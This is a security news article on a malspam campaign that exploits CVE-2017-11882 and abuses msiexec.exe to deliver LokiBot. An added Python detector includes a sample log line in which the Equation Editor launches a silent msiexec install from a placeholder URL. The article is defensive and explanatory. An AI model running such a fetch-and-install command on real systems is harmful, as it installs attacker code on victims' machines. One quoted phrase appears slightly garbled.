Trend Micro had previously outlined other attacks that exploit CVE-2017-11882, a memory corruption vulnerability in the Office Equation Editor that was patched last November. In a rather unusual twist, however, this campaign leverages the Windows Installer, msiexec.exe.
In a February 8 blog post, Trend Micro researchers Martin Co and Gilbert Sison reported that the malspam phishing emails associated with the attack used a lure asking recipients to confirm that a payment had been received. Although most of the content is written in English, the message also carries a warning in Korean advising recipients to check whether their PC is infected with a virus or malicious code, so Trend Micro believes Korean speakers are the intended targets.
The attachment, named Payment copy.Doc, is presented as a payment confirmation, but opening it triggers the exploit, which is used to download a Windows Installer package labeled zus.msi. This package then drops an obfuscated MSIL (Microsoft Intermediate Language) or Delphi binary. That binary, in turn, uses a hollowed-out instance of itself to produce the final payload, Loki, which is known for stealing passwords and cryptocurrency wallets.
Trend Micro researchers think the unusual choice of the Windows Installer may be a way to evade security software that watches for more traditional installation methods.
Co and Sison report: “Security software is already well-versed in monitoring possible download programs such as Wscript, Powershell, Mshta.exe, Winword.exe and other similar executables that have become increasingly popular for installing malicious payloads. Because of their widespread use, blocking the arrival of threats through these software becomes easy. However, using msiexec.exe to download malicious MSI packages is not what we usually see in most malware.”
Even so, “we cannot say with certainty whether the samples were delivered by descriptive means,” the researchers added.
The researchers point out that other malware families, including Andromeda, have abused the Windows Installer, but they modified the program in some way. In this case, however, the installer is left intact and used exactly as designed, just for malicious ends.
This latest attack is also an anomaly, since Microsoft installer packages are more often “abused for malicious purposes to install potentially unwanted applications … a new direction for malware creators,” the report notes.
In addition to taking the usual email security precautions, users can protect themselves against this specific threat by disabling or restricting the Windows Installer.
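As an added illustration of the monitoring gap the researchers describe, and of the restriction advised above, here is a small Python detection routine that is not from Trend Micro or the original article: it flags msiexec.exe launches that fetch a package from a URL or are spawned by an Office process. The key=value log format, the hosts and the process IDs in the sample are constructed; eqnedt32.exe is assumed to be the Equation Editor binary in which the exploit runs.

```python
"""Flag Windows Installer (msiexec.exe) launches matching the delivery pattern in
the article: msiexec pulling its package from a URL, or msiexec spawned by an
Office process. Log lines use a constructed Sysmon-like key="value" format."""
import re
import shlex

# Parents that should not normally launch the installer. winword.exe is named in
# the article; eqnedt32.exe is assumed to be the Equation Editor binary.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_FLAGS = {"/q", "/qn", "/quiet", "-q", "-qn", "-quiet"}

def parse_event(line):
    """Turn 'Key="value" Key2="value2"' into a dict (constructed log format)."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))

def analyze(event):
    """Return the reasons an event is suspicious; an empty list means benign."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "msiexec.exe":
        return []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    url = URL_RE.search(cmd)
    if url:  # installer told to download the package itself, as in this campaign
        reasons.append(f"remote MSI package: {url.group(0)}")
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {parent}")
    tokens = {t.lower() for t in shlex.split(cmd, posix=False)}
    if reasons and tokens & QUIET_FLAGS:  # silent install hides the UI from the user
        reasons.append("quiet install flag")
    return reasons

def scan(lines):
    """Map the ProcessId of each suspicious event to its list of reasons."""
    findings = {}
    for line in lines:
        ev = parse_event(line)
        reasons = analyze(ev)
        if reasons:
            findings[ev.get("ProcessId", "?")] = reasons
    return findings

# Constructed sample events; the hosts are placeholders, not indicators.
SAMPLE_LOG = [
    'ProcessId="1001" Image="C:\\Windows\\System32\\msiexec.exe" CommandLine="msiexec /i C:\\Users\\a\\Downloads\\7zip.msi" ParentImage="C:\\Windows\\explorer.exe"',
    'ProcessId="1002" Image="C:\\Windows\\System32\\msiexec.exe" CommandLine="msiexec.exe /q /i http://example.invalid/zus.msi" ParentImage="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"',
    'ProcessId="1003" Image="C:\\Windows\\System32\\msiexec.exe" CommandLine="msiexec /i https://example.invalid/update.msi /qn" ParentImage="C:\\Windows\\System32\\services.exe"',
    'ProcessId="1004" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd /c dir" ParentImage="C:\\Windows\\explorer.exe"',
]

if __name__ == "__main__":
    for pid, why in scan(SAMPLE_LOG).items():
        print(pid, "; ".join(why))
```

A local install from explorer.exe (event 1001) produces no finding, while the Office-spawned remote install (1002) trips all three rules.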
A recently observed malspam-based phishing campaign is exploiting a remote code execution vulnerability in Microsoft Office to infect victims with LokiBot malware via the Windows Installer service, Trend Micro has reported.
thumbnail courtesy of scmagazine.com